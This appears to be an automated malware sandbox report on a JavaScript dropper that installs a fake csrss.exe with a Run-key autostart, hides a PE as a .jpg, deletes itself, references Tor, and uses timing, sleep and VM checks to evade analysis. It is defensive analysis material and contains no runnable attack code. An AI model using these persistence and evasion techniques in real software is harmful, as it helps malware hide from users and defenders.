Source: csrss.exeString found in binary or memory: id-cmc-addExtensions
Source: csrss.exeString found in binary or memory: 68e src/or/addressmap.h fc122cd5462d0445cb668278744dd8778472cf54 src/or/buffers.h 03bcf0ecb460f7814ab484deb6f638f727704b94 src/or/channel.h 52340d597aa7c6cc5500f654f46733a4e577905a src/or/channeltls.h ff3a5693416ccf243f608a7bb943a078418c16d8 src/or/circpa
Source: csrss.exeString found in binary or memory: accounting/interval-start
Source: csrss.exeString found in binary or memory: .in-addr.arpa
Source: csrss.exeString found in binary or memory: X-Your-Address-Is:
Source: csrss.exeString found in binary or memory: X-Your-Address-Is: %s
Source: csrss.exeString found in binary or memory: cffd2d9eef71f1ae5f7eb4e16aa56b728abe65aa src/common/address.h 3890e58a3754bc0de32e7cf38de8a790c2c282af src/common/backtrace.h 947ef902f15f556f176b1115f09d9966e377347d src/common/aes.h 2ad59cee80471c42536e66e24e73a8948e345dcf src/common/ciphers.inc ceaa37cf
Source: csrss.exeString found in binary or memory: introduction-point %s ip-address %s onion-port %d onion-key %sservice-key %s
Source: csrss.exeString found in binary or memory: %d.%d.%d.%d.in-addr.arpa
Source: csrss.exeString found in binary or memory: --install
Source: csrss.exeString found in binary or memory: -install
Source: csrss.exeString found in binary or memory: set-addPolicy
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\437#U0430.js'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: unknownProcess created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknownProcess created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP4_2_0041A13C
PE file contains an invalid checksumShow sources
Source: radE040D.tmp.0.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Source: messg[1].jpg.0.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Source: csrss.exe.4.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0055020D push ecx; ret 4_2_00550220
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004006DF push ds; iretd 4_2_004006E3
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0044CC0D push ss; iretd 4_2_0044CC11
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0056F5DC push eax; ret 4_2_0056F5FA
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004016F7 push edi; retn 0014h4_2_004016FC
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_2_026740E0 push edx; ret 5_2_026741F1
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_2_02674080 push edx; ret 5_2_0267408B
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004159E0 push edx; ret 5_1_00415DBE
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0040144C push cs; iretd 5_1_0040144D
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041480D pushfd ; retf 0057h5_1_0041480E
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041881C push ebx; retf 5_1_0041884C
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041D0DD push ds; ret 5_1_0041D0E0
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004188F9 push ss; retf 5_1_00418902
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041B080 push edx; ret 5_1_0041B083
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004148B5 push D40057C8h; retf 0057h5_1_004148BA
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C177 push esp; iretd 5_1_0041C178
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418903 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041A51D push 7FD9F329h; retf 5_1_0041A522
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004185C9 pushfd ; retf 5_1_004185D8
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004189D0 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004149E0 push edx; ret 5_1_00414A07
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0055020D push ecx; ret 5_1_00550220
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418A19 push cs; iretd 5_1_00418A33
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041A6ED push edx; retf 5_1_0041A6F0
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00419E95 push ebp; iretd 5_1_00419E96
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041469D push eax; retf 0057h5_1_0041469E
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004146BD pushad ; retf 0057h5_1_004146BE
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00414701 push 6C0057CAh; retf 0057h5_1_00414706
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C302 push edi; retf 5_1_0041C305
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_00418F0B push ss; ret 5_1_00418F0C
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0041C7E2 push eax; ret 5_1_0041C87A

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpgJump to dropped file
Drops PE files to the application program directory (C:\ProgramData)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpFile created: C:\ProgramData\Windows\csrss.exeJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpgJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime SubsystemJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime SubsystemJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\437#u0430.jsJump to behavior
May use the Tor software to hide its network trafficShow sources
Source: csrss.exeBinary or memory string: onion-port
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP4_2_0041A13C
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004195BA rdtsc 5_1_004195BA
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found evaded block containing many API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpEvaded block: after key decisiongraph_4-50446
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-49130
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp TID: 3540Thread sleep count: 138 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp TID: 4624Thread sleep count: 152 > 30Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_00416D6D
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,4_2_00416AEC
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0040AA8F __EH_prolog,GetSystemInfo,4_2_0040AA8F
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat1
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat8\e
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b.manifestmV
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-onecore-encdump_31bf3856ad364e35_10.0.17134.1_none_c9af4ac1de264540\amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\amd64_microsoft-system-user-ext_31bf3856ad364e35_10.0.17134.1_none_60e18319883c0acb\aamd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\c9amd64_microsoft-windows-bcrypt-dll_31bf3856ad364e35_10.0.17134.1_none_d40d1fc458900e79\amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45\amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582f5cbd45f0\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-windows-aadjcsp_31bf3856ad364e35_10.0.17134.1_none_600d1259ff3335b6\b9amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\0e5bamd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ercommon-deployment_31bf3856ad364e35_10.0.17134.1_none_ffda9e2d3858e036.manifest
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumat
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1t34.1O\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.1_none_2d035fdf4cb254bf\7eamd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba\amd64_microsoft-windows-ad-propertypages_31bf3856ad364e35_10.0.17134.1_none_d37a0ec2b596cdaf\eamd64_microsoft-onecore-assignedaccess-csp_31bf3856ad364e35_10.0.17134.1_none_37310745ce695f93\amd64_microsoft-onecore-bluetooth-service_31bf3856ad364e35_10.0.17134.1_none_d1cde1fc2644ba6c\amd64_microsoft-onecore-bluetooth-userapis_31bf3856ad364e35_10.0.17134.1_none_5135b094293fbb0b\amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.165_none_2917828339aae782\amd64_microsoft-onecore-console-host-core_31bf3856ad364e35_10.0.17134.1_none_5316cfc78d5f777e\amd64_microsoft-onecore-dolbyhrtfenc_31bf3856ad364e35_10.0.17134.1_none_fc1917e579d73fea\7amd64_microsoft-onecore-bluetooth-proxy_31bf3856ad364e35_10.0.17134.1_none_d1d1581b008d2447\amd64
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumum
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catT
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.1d\
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat\
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8.manifest
Source: radE040D.tmp, 00000004.00000003.7131093033.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Packa
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumcat
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumt
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.1t
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239.manifestO
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_bae31ba10711fa29.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.17134.1_none_2becad3b77bb3580.manifestest#
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmpBinary or memory string: RnGteKdWF/DzReAcBhgFS14E9Bt2wEanR++IZpEw+J9HVAFMRnNpAgMBAAE=
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.17134.1_none_fc7308d7bbb0dfd6.manifesteav
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1.manifest
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.18\e
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80\7]
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8.manifest
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumtt
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumL
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7130318718.000000000311F000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1ati
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat34.1
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_611f8a7fa810774a.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa\n
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1at
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_heartbeat.inf_31bf3856ad364e35_10.0.17134.1_none_8f1854ea8397fa4d\amd64_dual_xboxgipsynthetic.inf_31bf3856ad364e35_10.0.17134.1_none_01e5cd3901fe7446\amd64_dual_wudfusbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_3acf25bb0f3d80b9\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\3240amd64_e2xw10x64.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_3f995ebb761ce9ea\amd64_dual_transfercable.inf_31bf3856ad364e35_10.0.17134.1_none_d402232d8ab51364\amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_tsusbhubfilter.inf_31bf3856ad364e35_10.0.17134.1_none_8abfd8e8cc7b9e4c\amd64_dual_tsgenericu
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64\
Source: radE040D.tmp, 00000004.00000003.7130819819.000000000316B000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat4.1uUp
Source: radE040D.tmp, 00000004.00000003.7062337228.0000000003122000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.17134.1_none_bcf0637138185dcf.manifestK
